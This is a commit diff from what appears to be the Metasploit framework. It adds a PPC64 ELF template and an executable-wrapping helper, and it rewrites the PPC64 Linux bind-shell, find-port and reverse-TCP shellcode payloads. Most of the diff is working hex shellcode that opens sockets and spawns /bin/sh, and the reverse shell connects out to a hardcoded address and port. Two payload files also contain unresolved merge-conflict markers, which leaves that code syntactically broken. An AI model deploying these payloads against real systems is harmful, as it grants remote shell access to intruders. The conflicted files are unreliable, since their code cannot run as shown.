Skip to content

Commit 00852f4

Browse files
msutovsky-r7msutovsky-r7
committed
Adding PPC64 template, fixing PPC64 single payloads
1 parent c0dfbf4 commit 00852f4

File tree

7 files changed

+205
-55
lines changed

7 files changed

+205
-55
lines changed

data/templates/src/elf/exe/elf_ppc64_template.s

Lines changed: 35 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
BITS 64
2+
ehdr: ; Elf32_Ehdr
3+
db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident
4+
db 0, 0, 0, 0, 0, 0, 0, 0 ;
5+
dw 0x0200 ; e_type = ET_EXEC for an executable
6+
dw 0x1500 ; e_machine = PPC64
7+
dd 0x01000000 ; e_version
8+
dq 0x7810000000000000 ; e_entry
9+
dq 0x4000000000000000 ; e_phoff
10+
dq 0 ; e_shoff
11+
dd 0 ; e_flags
12+
dw 0x4000 ; e_ehsize
13+
dw 0x3800 ; e_phentsize
14+
dw 0x0100 ; e_phnum
15+
dw 0 ; e_shentsize
16+
dw 0 ; e_shnum
17+
dw 0 ; e_shstrndx
18+
19+
ehdrsize equ $ - ehdr
20+
21+
phdr: ; Elf32_Phdr
22+
23+
dd 0x01000000 ; p_type = pt_load
24+
dd 0x07000000 ; p_flags = rwx
25+
dq 0 ; p_offset
26+
dq 0x0010000000000000 ; p_vaddr
27+
dq 0x0010000000000000 ; p_paddr
28+
dq 0xefbeadde ; p_filesz
29+
dq 0xefbeadde ; p_memsz
30+
dq 0x0000100000000000 ; p_align
31+
32+
phdrsize equ $ - phdr
33+
34+
_start:
35+
dq 0x8010000000000000

data/templates/template_ppc64_linux.bin

128 Bytes
Binary file not shown.

lib/msf/core/payload/linux/prepend_inject.rb

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
# -*- coding: binary -*-
2+
3+
###
4+
#
5+
# This mixin provides support for generating PrependInject blocks for Linux payloads
6+
#
7+
###
8+
module Msf::Payload::Linux::PrependInject
9+
10+
end

lib/msf/util/exe.rb

Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1232,6 +1232,16 @@ def self.to_linux_aarch64_elf(framework, code, opts = {})
12321232
to_exe_elf(framework, opts, "template_aarch64_linux.bin", code)
12331233
end
12341234

1235+
# self.to_linux_ppc64_elf
1236+
#
1237+
# @param framework [Msf::Framework]
1238+
# @param code [String]
1239+
# @param opts [Hash]
1240+
# @option [String] :template
1241+
# @return [String] Returns an elf
1242+
def self.to_linux_ppc64_elf(framework, code, opts = {})
1243+
to_exe_elf(framework, opts, "template_ppc64_linux.bin", code, true)
1244+
end
12351245
# self.to_linux_mipsle_elf
12361246
# Little Endian
12371247
# @param framework [Msf::Framework]
@@ -2178,6 +2188,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
21782188
to_linux_x64_elf(framework, code, exeopts)
21792189
when ARCH_AARCH64
21802190
to_linux_aarch64_elf(framework, code, exeopts)
2191+
when ARCH_PPC64
2192+
to_linux_ppc64_elf(framework, code, exeopts)
21812193
when ARCH_ARMLE
21822194
to_linux_armle_elf(framework, code, exeopts)
21832195
when ARCH_MIPSBE

modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb

Lines changed: 55 additions & 55 deletions
Original file line numberDiff line numberDiff line change
@@ -28,61 +28,61 @@ def initialize(info = {})
2828
'LPORT' => [ 58, 'n' ]
2929
},
3030
'Payload' =>
31-
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
32-
"\x3b\xa0\x01\xff" + # li r29,511 #
33-
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
34-
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
35-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
36-
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
37-
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
38-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
39-
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
40-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
41-
"\x44\xff\xff\x02" + # sc #
42-
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
43-
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
44-
"\x3e\xe0\xff\x02" + # lis r23,-254 #
45-
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
46-
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
47-
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
48-
"\x7c\x36\x0b\x78" + # mr r22,r1 #
49-
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
50-
"\xfa\xc1\xff\xf9" + # stdu r22,-8(r1) #
51-
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
52-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
53-
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
54-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
55-
"\x44\xff\xff\x02" + # sc #
56-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
57-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
58-
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
59-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
60-
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
61-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
62-
"\x44\xff\xff\x02" + # sc #
63-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
64-
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
65-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
66-
"\x44\xff\xff\x02" + # sc #
67-
"\x7c\x75\x1b\x78" + # mr r21,r3 #
68-
"\x7f\x64\xdb\x78" + # mr r4,r27 #
69-
"\x7e\xa3\xab\x78" + # mr r3,r21 #
70-
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
71-
"\x44\xff\xff\x02" + # sc #
72-
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
73-
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
74-
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
75-
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode64+172> #
76-
"\x7f\xc8\x02\xa6" + # mflr r30 #
77-
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
78-
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
79-
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
80-
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
81-
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
82-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
83-
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
84-
"\x44\xff\xff\x02" + # sc #
85-
'/bin/sh'
31+
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
32+
"\x3b\xa0\x01\xff" + # li r29,511 #
33+
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
34+
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
35+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
36+
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
37+
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
38+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
39+
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
40+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
41+
"\x44\xff\xff\x02" + # sc #
42+
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
43+
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
44+
"\x3e\xe0\xff\x02" + # lis r23,-254 #
45+
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
46+
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
47+
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
48+
"\x7c\x36\x0b\x78" + # mr r22,r1 #
49+
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
50+
"\xfa\xc1\xff\xf9" + # stdu r22,-8(r1) #
51+
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
52+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
53+
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
54+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
55+
"\x44\xff\xff\x02" + # sc #
56+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
57+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
58+
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
59+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
60+
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
61+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
62+
"\x44\xff\xff\x02" + # sc #
63+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
64+
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
65+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
66+
"\x44\xff\xff\x02" + # sc #
67+
"\x7c\x75\x1b\x78" + # mr r21,r3 #
68+
"\x7f\x64\xdb\x78" + # mr r4,r27 #
69+
"\x7e\xa3\xab\x78" + # mr r3,r21 #
70+
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
71+
"\x44\xff\xff\x02" + # sc #
72+
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
73+
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
74+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
75+
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode64+172> #
76+
"\x7f\xc8\x02\xa6" + # mflr r30 #
77+
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
78+
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
79+
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
80+
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
81+
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
82+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
83+
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
84+
"\x44\xff\xff\x02" + # sc #
85+
"/bin/sh"
8686
}
8787
)
8888
)

modules/payloads/singles/linux/ppc64/shell_find_port.rb

Lines changed: 45 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -28,6 +28,7 @@ def initialize(info = {})
2828
'CPORT' => [ 86, 'n' ]
2929
},
3030
'Payload' =>
31+
<<<<<<< HEAD
3132
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
3233
"\x3b\xa0\x01\xff" + # li r29,511 #
3334
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
@@ -70,6 +71,50 @@ def initialize(info = {})
7071
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
7172
"\x44\xff\xff\x02" + # sc #
7273
'/bin/sh'
74+
=======
75+
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
76+
"\x3b\xa0\x01\xff" + # li r29,511 #
77+
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
78+
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
79+
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
80+
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
81+
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
82+
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
83+
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
84+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
85+
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
86+
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
87+
"\x38\x21\x01\xff" + # addi r1,r1,511 #
88+
"\x38\x21\xfe\x09" + # addi r1,r1,-503 #
89+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
90+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
91+
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
92+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
93+
"\x44\x00\x00\x02" + # sc #
94+
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
95+
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
96+
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
97+
"\x40\x82\xff\xd0" + # bne+ <fndsockcode64+40> #
98+
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
99+
"\x7f\x04\xc3\x78" + # mr r4,r24 #
100+
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
101+
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
102+
"\x44\x00\x00\x02" + # sc #
103+
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
104+
"\x40\x80\xff\xec" + # bge+ <fndsockcode64+96> #
105+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
106+
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode64+120> #
107+
"\x7f\xc8\x02\xa6" + # mflr r30 #
108+
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
109+
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
110+
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
111+
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
112+
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
113+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
114+
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
115+
"\x44\x00\x00\x02" + # sc #
116+
"/bin/sh"
117+
>>>>>>> d127729c5cf (Adding PPC64 template, fixing PPC64 single payloads)
73118
}
74119
)
75120
)

modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb

Lines changed: 48 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -29,6 +29,7 @@ def initialize(info = {})
2929
'LPORT' => [ 62, 'n' ]
3030
},
3131
'Payload' =>
32+
<<<<<<< HEAD
3233
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
3334
"\x3b\xa0\x01\xff" + # li r29,511 #
3435
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
@@ -74,6 +75,53 @@ def initialize(info = {})
7475
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
7576
"\x44\xff\xff\x02" + # sc #
7677
'/bin/sh'
78+
=======
79+
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
80+
"\x3b\xa0\x01\xff" + # li r29,511 #
81+
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
82+
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
83+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
84+
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
85+
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
86+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
87+
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
88+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
89+
"\x44\x00\x00\x02" + # sc #
90+
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
91+
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
92+
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
93+
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
94+
"\x3a\xc0\x04\xd2" + # li r22,1234 #
95+
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
96+
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
97+
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
98+
"\x7c\x35\x0b\x78" + # mr r21,r1 #
99+
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
100+
"\xfa\xa1\xff\xf9" + # stdu r21,-8(r1) #
101+
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
102+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
103+
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
104+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
105+
"\x44\x00\x00\x02" + # sc #
106+
"\x7f\x64\xdb\x78" + # mr r4,r27 #
107+
"\x7f\x43\xd3\x78" + # mr r3,r26 #
108+
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
109+
"\x44\x00\x00\x02" + # sc #
110+
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
111+
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
112+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
113+
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode64+132> #
114+
"\x7f\xc8\x02\xa6" + # mflr r30 #
115+
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
116+
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
117+
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
118+
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
119+
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
120+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
121+
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
122+
"\x44\x00\x00\x02" + # sc #
123+
"/bin/sh"
124+
>>>>>>> d127729c5cf (Adding PPC64 template, fixing PPC64 single payloads)
77125
}
78126
)
79127
)

0 commit comments

Comments
 (0)